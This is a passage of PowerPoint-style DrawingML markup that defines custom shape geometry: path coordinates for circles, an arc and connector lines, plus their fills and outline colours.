                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2269062" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304289" y="2489199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338581" y="2463799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371910" y="2438399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404252" y="2400299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435580" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465869" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2495091" y="2298699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523221" y="2260599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2550233" y="2235199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576100" y="2197100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2600798" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2624299" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646578" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667609" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687364" y="1993900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2705820" y="1955800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2722949" y="1905000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2738725" y="1866900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2753122" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766114" y="1778000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2777676" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787780" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796402" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803514" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2809091" y="1549400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813107" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2815536" y="1447800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="1409700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2815536" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813107" y="1308100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2809091" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803514" y="1219200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796402" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787780" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2777676" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766114" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2753122" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2738725" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2722949" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2705820" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687364" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667609" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646578" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2624299" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2600798" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576100" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2550233" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523221" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2495091" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465869" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435580" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404252" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371910" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338581" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304289" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2269062" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232926" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2195906" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158028" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119319" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079805" y="165100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2816859" h="2806700">
                  <a:moveTo>
                    <a:pt x="1552305" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1264046" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216900" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599451" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552305" y="0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288621" y="399068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75893" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128723" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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288621" y="399068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261274" y="43342"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290169" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="43342"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="DDEAF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288621" y="5865134"/>
              <a:ext cx="304800" cy="303530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="304800" h="303529">
                  <a:moveTo>
                    <a:pt x="175893" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128723" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFC21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288621" y="5865134"/>
              <a:ext cx="304800" cy="303530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="304800" h="303529">
                  <a:moveTo>
                    <a:pt x="43342" y="43159"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="83344" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304617" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290169" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261274" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221272" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175893" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128723" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83344" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14447" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43342" y="43159"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FFF1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163070" y="5865134"/>
              <a:ext cx="303530" cy="303530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303529" h="303529">
                  <a:moveTo>
                    <a:pt x="175089" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128146" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17508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163070" y="5865134"/>
              <a:ext cx="303530" cy="303530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303529" h="303529">
                  <a:moveTo>
                    <a:pt x="43159" y="260075"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14386" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="14386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="43159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="82982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="128146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="175089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="220252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="260075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="303235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="288848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="260075"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="ECECE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163070" y="3990685"/>
              <a:ext cx="303530" cy="304800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303529" h="304800">
                  <a:moveTo>
                    <a:pt x="175089" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128146" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD69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163070" y="3990685"/>
              <a:ext cx="303530" cy="304800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303529" h="304800">
                  <a:moveTo>
                    <a:pt x="260075" y="261274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="220252" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="304617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="290169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="261274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14386" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43159" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82982" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128146" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175089" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220252" y="14447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="43342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="83344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="128723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303235" y="175893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288848" y="221272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260075" y="261274"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FAE3D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249923" y="3555491"/>
              <a:ext cx="1011555" cy="465455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1011554" h="465454">
                  <a:moveTo>
                    <a:pt x="556386" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="24637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548131" y="24637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882015" y="357378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873509" y="380140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872744" y="403653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879693" y="425618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894333" y="443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916185" y="459882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942276" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969129" y="459882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993267" y="443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1007133" y="419558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011332" y="392318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1005482" y="365103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989202" y="340995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968003" y="327136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943340" y="322516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917890" y="327136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894333" y="340995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556386" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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455483" y="3517391"/>
              <a:ext cx="1010285" cy="465455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1010284" h="465454">
                  <a:moveTo>
                    <a:pt x="1009824" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454199" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116760" y="340995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93279" y="327136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67881" y="322516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43269" y="327136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="340995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5863" y="365103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="392318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4161" y="419558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17954" y="443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42090" y="459882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68929" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94982" y="459882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116760" y="443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131454" y="425618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138398" y="403653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137602" y="380140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129079" y="357378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462454" y="24637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009824" y="24637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009824" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD69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284975" y="6273863"/>
              <a:ext cx="1010285" cy="465455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1010284" h="465454">
                  <a:moveTo>
                    <a:pt x="940895" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="914842" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893064" y="21526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878369" y="39645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871426" y="61610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872222" y="85123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880745" y="107886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547370" y="440626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="440626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555625" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893064" y="124269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916545" y="138128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941943" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966555" y="138128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987678" y="124269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003960" y="100161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009824" y="72945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1005663" y="45706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991870" y="21526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967734" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="940895" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFC21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9455483" y="6176327"/>
              <a:ext cx="1010285" cy="465455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1010284" h="465454">
                  <a:moveTo>
                    <a:pt x="68929" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42090" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17954" y="21526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4161" y="45706"/>
                  </a:lnTo>
                  <a:lnTo>
